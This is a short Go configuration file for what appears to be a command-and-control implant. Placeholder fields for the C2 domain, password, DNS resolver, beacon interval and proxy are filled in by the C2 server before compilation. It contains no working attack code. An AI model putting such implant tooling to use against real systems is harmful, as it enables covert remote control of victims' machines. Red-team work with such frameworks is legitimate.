package config

// config.go is modified by c2 before compilation

type Config struct {
	C2Domain        string
	C2Password      string
	Resolver        string
	C2Interval      int
    ThrottleSendQ  bool
	ProxyEnabled    bool
	ProxyUrl        string
	ProxyKey        string
}

func (c *Config) Init() {
    c.C2Domain = "[C2_DOMAIN]"
	c.C2Password = "[C2_PASSWORD]"
	c.Resolver = "[RESOLVER]"
	c.C2Interval = 5000
	c.ThrottleSendQ = false
	c.ProxyEnabled = false
	c.ProxyUrl = "[PROXY_URL]"
	c.ProxyKey = "[PROXY_KEY]"
}
